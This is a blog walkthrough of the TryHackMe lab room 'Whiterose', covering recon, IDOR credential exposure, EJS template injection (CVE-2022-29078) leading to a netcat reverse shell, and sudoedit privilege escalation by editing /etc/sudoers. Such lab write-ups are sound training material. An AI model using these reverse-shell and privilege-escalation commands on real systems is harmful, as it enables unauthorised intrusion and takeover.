Whiterose TryHackMe Motion Graphics Writeup | Easy Room | Detailed THM Walkthrough

Sunny Singh Verma [ SuNnY ]
InfoSec Write-ups
Published in
9 min readNov 2, 2024

Full writeup for the TryHackMe room : Whiterose ( Easy Room )

Kudos to the Creator(s) of this room →

ROOM DIFFICULTY

Easy → Difficulty
[ Name : Whiterose , Room loosely Based on the TV Show → Mr. Robot ]
This is a Free Room. Anyone can deploy virtual machines in the room
(without being subscribed)!

Let’s Start the VM

Note → We are given the Login Credentials at the very beginning
This maybe helpful information for the later part →

Olivia Cortez:olivi8

Initial Reconnaissance

Let’s do an nmap scan →

nmap -sVC -A -T4 -p- whiterose.thm -oN nmapscan.txt

Nmap Scan Results →

Click on the image above to enlarge the scan results

Ports Found in Open State From nmap scan →

Port 22 :
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7
(Ubuntu Linux; protocol 2.0)

Port 80 :
80/tcp open http nginx 1.14.0 (Ubuntu)

Let’s check the HTTP port ( port number 80 ) by going to →

http://whiterose.thm

When trying to access Port 80 ( http://whiterose.thm )
We are redirected to a new URL ( http://cyprusbank.thm )

Time to add another entry to our /etc/hosts file

10.10.x.x is your IP address of this Room → could differ for you

Let’s Refesh the Page after Setting the new Domain entry in /etc/hosts

There is not much found from the newly discovered URL

Time to Directory Brute-Force ( gobuster )

gobuster dir -u http://cyprusbank.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o results.txt

This is starting to get a little bit boring now ….

Let’s do a Sub-Domain Brute Force ( FFUF )

ffuf -u http://whiterose.thm/ -H "HOST: FUZZ.cyprusbank.thm" 
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
-fw 1

ffuf -u http://whiterose.thm/ -H “HOST: FUZZ.cyprusbank.thm” -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 1

We Found a new Sub-Domain → Adminadmin.cyprusbank.thm

Let’s now again add the sub-domain entry to /etc/hosts file

Now after adding the Sub-Domain entry to /etc/hosts
Let’s check the page →

We have got a Login Page @ admin.cyprusbank.thm

Can we use these credentials → Olivia Cortez : olivi8 on this page ?
Let’s find out ..

Wow …. Credentials worked ! 😮

There are 5 menus in the Header Section →

Home     Search    Settings    Messages    Logout

Question 1 : What’s Tyrell Wellick’s phone number?

Let’s try the search tab to look for Tyrell Wellick’s Phone Number →

Upon exploring we Found an entry of Tyrell Wellick in Recent Payments
It’s in asterisk , which means that the user we are logged into doesn’t have proper privileges to check the PII or Private information , We have to upgrade the user or use a higher privilege user account

Click on the image to enlarge

In the Message section we see the ending URL has a number
The vulnerability we can try here is called Insecure Direct Object Reference (IDOR). This occurs when an application exposes a reference to an internal object (like a database record or file) directly in the URL. If there are no proper access controls or authorization checks, attackers can manipulate these references (in your case, changing the c parameter in the URL) to access resources they’re not authorized to view.

In this case , changing ?c=1, ?c=2, etc., might reveal different messages or records without proper permission checks, allowing unauthorized access to sensitive data. IDOR vulnerabilities are part of the broader Broken Access Control category in the OWASP Top 10.

Now Let’s Try This out →

Voila ! We found credentials on ?/c=8 for another User named →
Gayle Bev

Gayle Bev : p~]P@5!6;rs558:q

Now let’s Log out from our current session and login to Gayle Bev

We are able to successfully log in as user Gayle Bev

Let’s look for an Entry which has the name → Tyrell Wellick using the search tab while Logged in to the User → Gayle Bev

We found the Phone Number of → Tyrell Wellick

Answer ( Redacted )  :  842-0**-****
Tyrell Wellick → “ Man ! Now they have my Phone Number “ 😂

Next up → What is the user.txt flag ?

Gaining Foothold

While still being logged in as user → Gayle Bev

We are able to now access the Settings page as User → Gayle Bev

In the customer settings page there are two entries →
Enter a Customer Name & Enter a New Password

Now keeping in mind that there are a lot of Customer names in the home page i tried entering the Individual Name and tried entering a New Password , so that i can use these credentials to log into to that account , Just like we did earlier , but it doesn’t work that way .

Time to use our Favourite tool → Burp Suite

Sending the request to Burpsuite as user:pass admin:admin
User and Password can be set to anything ,
Let’s get our request to Repeater in Burp Suite

After Sending the Request to Repeater and sending the request we see a 200 OK return , Let’s play with the Parameters of Password from password to passworda , you can also remove the placeholder password , the objective here is to return an error code ( 500 )

We found /home/web/app/views/settings.ejs
The file path /home/web/app/views/settings.ejs likely points to an EJS (Embedded JavaScript) template file used in a Node.js or Express.js web application.

After doing a little research i found a EJS SSTI vulnerability →

[ CVE-2022–29078 ] → EJS Server Side Template Injection RCE → PoC ( Link to the Writeup Below )

For some reason medium doesn’t allow to show the RCE command on this post but you can take the reference from this section →

in this PoC we are using port 1337 , but for this writeup i will be using port 1234 for the reverse shell , you can continue with the default one if you want .

Don’t forget to start the Netcat session →

For this case replacing the reverse shell used in PoC → nc -e sh IP-address PORT by that of BusyBox from revshells.com gave us the reverse shell successfully

We are now going to get the Web reverse shell from the PoC using the BusyBox nc command

Let’s upgrade our Reverse Shell to TTY

Upgrading to a TTY (teletype) shell allows you to interact with it more reliably.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Then ,

export TERM=xterm

CTRL + z

stty raw -echo; fg

Now we have a stable shell with us

By listing the current directory we see user.txt file

We got our User Flag →

Next up → Root Machine & find the root.txt flag

Very first thing to always check is by doing → sudo -l

The sudo -l command displays a list of commands that the current user is allowed to run with sudo privileges on the system .

The user web that we have the shell currently can run this command with root privileges →

(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

On doing some more research , you can find the Sudoedit Privilege Escalation technique from the blog post blog →

We are going to use the Step 1 from the article →

export EDITOR="vim -- /etc/sudoers"

We have exported the editor to VIM , now we are going to edit the /etc/sudoers file

For this we need to check our user , which is → web

Now we need to add user → web to the sudoers list

web ALL=(ALL:ALL) ALL

Now we are able to open the Text editor VIM for editing the sudoers list →

Let’s use the command we found from sudo -l

Now we can add the entry right next to the root entry →

web ALL=(ALL:ALL) ALL

Now after adding the above entry for user web to the sudoers file don’t forget to save it using the command → :wq

We can now run → sudo su to gain root access

Then Change the Directory to /root and cat the Flag

cd /root
cat root.txt

We are now Root !

Well I am Whiterose .. nice to meet you

Congratulations! We have solved the room together! and made whiterose laugh nervously.

You champ ! You hacked into the Dark Army Leader’s Machine ( easy machine ) 😜

Hope you have enjoyed solving this room as much i did

if you want to get the latest Try Hack Me writeups delivered , go ahead and follow me on Medium and also hit the notify via email

Let’s Connect on Linkedin → https://linkedin.com/in/sunnysinghverma

You can also add me Respect on — Hack The Box if you want i would really appreciate it :)

https://app.hackthebox.com/users/1585635

My TryHackMe Profile Page →

https://tryhackme.com/p/SuNnY

if you did you can add a clap to this article to let me know and if you loved this article you can click clap icon upto 50 times to let me know and that will make my day 🤗
You can also follow me on medium to get more articles about CTFs and Cybersecurity in the near Future but don’t forget to hit that email notification icon right next to the follow me button

Thank you !
SuNnY

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by Sunny Singh Verma [ SuNnY ]

Blogger | Security+ | eJPT | PJPT | CEH-Master | eCPPT | PNPT | CHFI | HTB-CPTS CDSA | RHCSA | TryHackMe Top 50 Global | HTB-Elite H@cker | Follow for updates

Responses (1)

Write a response